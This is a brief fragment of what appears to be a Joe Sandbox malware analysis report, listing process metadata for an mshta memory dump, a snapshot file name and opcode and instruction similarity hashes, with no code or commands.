      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:false

      Reset < >
        Memory Dump Source
        • Source File: 00000003.00000003.1371878925.000001D187080000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D187080000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_3_1d187080000_mshta.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
        • Instruction ID: 96f7873acde54599fa2dc17d89ac3e6734cf6eb66ca8bb1e2d0aaa285d28b526
        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
        • Instruction Fuzzy Hash: 0890021449544675D81451D10C8529C5040A789250FE48481482690545D45D02A66152